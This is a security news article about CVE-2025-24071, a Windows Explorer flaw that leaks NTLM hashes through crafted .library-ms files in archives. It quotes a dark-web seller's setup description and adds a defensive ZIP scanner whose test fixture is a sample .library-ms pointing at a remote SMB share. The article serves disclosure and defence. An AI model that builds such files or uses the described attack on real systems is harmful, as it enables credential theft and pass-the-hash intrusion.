A critical vulnerability in Microsoft Windows File Explorer, tracked as CVE-2025-24071, has been identified as a significant threat: it enables attackers to covertly capture NTLM hashed passwords without any user interaction. The flaw, dubbed the "NTLM Hash Leak via RAR/ZIP Extraction," is especially concerning because it abuses automatic file-processing features built into the Windows operating system.
Discovered and publicly reported in mid-March 2025, the vulnerability relies on Windows Explorer automatically processing specially crafted .library-ms files extracted from compressed archives such as RAR or ZIP. Security researchers explained that these XML-based files, which Windows trusts to define library locations, contain tags pointing to an attacker-controlled SMB server (e.g., \\192.168.1.116\shared). As soon as the file is extracted from the archive, Windows attempts to resolve the SMB path, which triggers an automatic NTLM authentication handshake and leaks the victim's credentials without their knowledge.
A security researcher known as ‘0x6rss’ went public with a proof-of-concept exploit on GitHub just days after the discovery, showing how such attacks can be carried out. The PoC is a simple Python script that generates the malicious .library-ms file; it runs with a single command, python poc.py, which lowers the bar for potential attackers.
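The mechanism described above can be checked for from the defender's side before an archive is ever extracted. The following scanner is an added example, not code from the original report or from the published PoC: it reads a ZIP in memory, parses any .library-ms member as XML, and reports every element whose text names a remote location (a UNC path or a file:// URL with a host). The archive and the library file it contains are constructed here as sample input; the address 192.0.2.10 is a documentation address, not a real server.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# A remote location starts with \\host or file://host (Explorer resolves both over SMB).
REMOTE_RE = re.compile(r"^\s*(\\\\|file://)[^\\/\s]+", re.IGNORECASE)


def remote_locations(xml_bytes: bytes) -> list[str]:
    """Return every element text in a .library-ms document that names a remote location.
    The walk is schema-agnostic, so a location hidden in an unexpected tag is still reported."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return []  # not well-formed XML: nothing for Explorer to resolve, nothing to report
    return [el.text.strip() for el in root.iter() if el.text and REMOTE_RE.match(el.text)]


def scan_archive(data: bytes) -> dict[str, list[str]]:
    """Map each .library-ms member of a ZIP to the remote paths it references.
    Members are read straight from the archive, never written to disk, so Explorer never sees them."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".library-ms"):
                paths = remote_locations(zf.read(info))
                if paths:
                    findings[info.filename] = paths
    return findings


# Constructed sample: a minimal library description whose only location is a remote share.
SAMPLE_LIBRARY_MS = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\192.0.2.10\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""


def build_sample_zip() -> bytes:
    """Constructed test archive: one harmless text file plus the library file above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "nothing to see here")
        zf.writestr("Documents.library-ms", SAMPLE_LIBRARY_MS)
    return buf.getvalue()


if __name__ == "__main__":
    for member, paths in scan_archive(build_sample_zip()).items():
        print(f"{member}: references remote location(s) {paths}")
```

A mail gateway or download hook can run `scan_archive` on each attachment and quarantine anything it reports; the same `remote_locations` check applies to loose .library-ms files on disk.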
The implications of this vulnerability are profound. Attackers can leverage the harvested hash in several ways, including pass-the-hash attacks that compromise network security, as well as offline NTLM hash cracking. The severity of the flaw has led to a CVSS score of 7.5, categorizing it as a significant risk that demands immediate attention.
Furthermore, the exploit's potential has been underscored by a threat actor known as “Krypt0n,” who has reportedly offered the exploit for sale on dark web forums. “The server where the hashes are sent is created locally, for example, on a VPS,” Krypt0n was quoted as saying in online discussions. “Then, using an exploit, you generate a config with your IP, share, etc. […] If the user simply opens Explorer or accesses the shared folder, an automatic redirect occurs, and the user’s hash is sent to your server.”
In light of this vulnerability, Microsoft swiftly responded by releasing a critical patch in its March 2025 Patch Tuesday updates on March 11. Windows users are strongly advised to apply these updates immediately to mitigate the risk of exploitation. Microsoft has been actively encouraging its user base to stay current with updates to fend off such vulnerabilities, as this flaw highlights both the fragility of NTLM authentication and its susceptibility to exploitation.
The vulnerability affects a wide range of Windows versions, including Windows 10 (versions 1607, 1809, 21H2, 22H2, 23H2, and 24H2), Windows 11 (24H2 and 23H2), and multiple releases of Windows Server, underscoring its broad impact across Microsoft’s ecosystem.
Research indicates that the vulnerability has already been exploited in the wild, so users who handle sensitive credentials and rely on NTLM should be especially cautious. Experts recommend that users not only ensure their systems are running the latest security patches but also consider disabling NTLM where feasible and implementing additional measures, such as SMB signing, to further strengthen their defenses against such attacks.
As technology continues to evolve, so do the tactics used by malicious actors. The discovery and exploitation of CVE-2025-24071 serve as a stark reminder of the relentless challenges that users face in securing their systems against sophisticated threats. By ensuring that systems are updated and understanding the mechanics of potential vulnerabilities like this, users can better protect themselves from falling victim to cyberattacks that exploit fundamental flaws in systems they rely on daily.